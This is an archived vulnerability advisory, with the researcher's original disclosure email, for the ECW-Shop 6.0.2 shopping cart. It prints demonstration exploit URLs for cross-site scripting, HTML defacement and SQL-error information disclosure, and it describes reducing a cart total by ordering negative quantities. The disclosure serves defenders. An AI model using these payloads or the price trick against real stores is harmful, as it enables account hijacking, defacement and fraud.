SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Commerce)  >  ECW-Shop Vendors:  ECW-Shop
ECW-Shop Bugs Permit SQL Injection, Cross-Site Scripting, and Price Modification
SecurityTracker Alert ID:  1014734
SecurityTracker URL:  http://securitytracker.com/id?1014734
CVE Reference:  CVE-2005-2621 ,  CVE-2005-2622 ,  CVE-2005-2623   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 19 2005
Impact:  Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 6.0.2
Description:  Several vulnerabilities were reported in ECW-Shop. A remote user can modify the shopping cart total price. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary HTML to be executed by the target user's browser. The code will originate from the site running the ECW-Shop software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The 'max' and 'ctg' parameters are affected.

Some demonstration exploit URLs are provided:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d 8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>

http://[target]/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>D EFACED!</H1>&comp=&min=1&max=1

A remote user can supply the following URLs to cause the system to disclose system information in an error message:

http://[target]/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1

http://[target]/index.php?c=srch&ctg= Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='

It may be possible to inject SQL commands, but the report did not confirm SQL injection.

A remote user can add a negative quantity of an item to the shopping cart to cause the total price of the cart contents to be reduced by the appropriate amount.

The vendor was notified on June 8, 2005.

John Cobb discovered these vulnerabilities.
Impact:  A remote user can modify the shopping cart total price.

A remote user may be able to inject SQL commands.

A remote user can also conduct cross-site scripting attacks.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.soft4e.com/ (Links to External Site)
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "John Cobb" <johnc@nobytes.com>
Message History:   None.

 Source Message Contents
Date:  Mon, 15 Aug 2005 23:29:10 +0100
From:  "John Cobb" <johnc@nobytes.com>
Subject:  [NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities

 
Hello All,

I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2

Authors Site: http://www.soft4e.com/

ECW Shop is described by its authors as:

ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.

+-[Examples:]--------------------------------------------------+



[1]------------------------------------------------------------+

XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</scr
ipt
 

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

[3]------------------------------------------------------------+

HTML Injection:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&
ma
x=1

[4]------------------------------------------------------------+

Cart/Order Manipulation:

You can add negative quanity value items to your cart to gain credit.

Example:

Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of
£6.99

Cart Total: £2.00

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE


JohnC@NoBytes.com

http://www.NoBytes.com


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC